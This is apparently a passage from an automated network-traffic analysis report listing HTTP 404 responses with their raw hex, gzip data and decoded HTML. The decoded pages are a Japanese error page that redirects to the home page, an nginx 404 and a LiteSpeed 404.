73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:48 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:50 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:53 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:55 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 05 Nov 2024 14:24:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 05 Nov 2024 14:24:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 05 Nov 2024 14:24:34 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
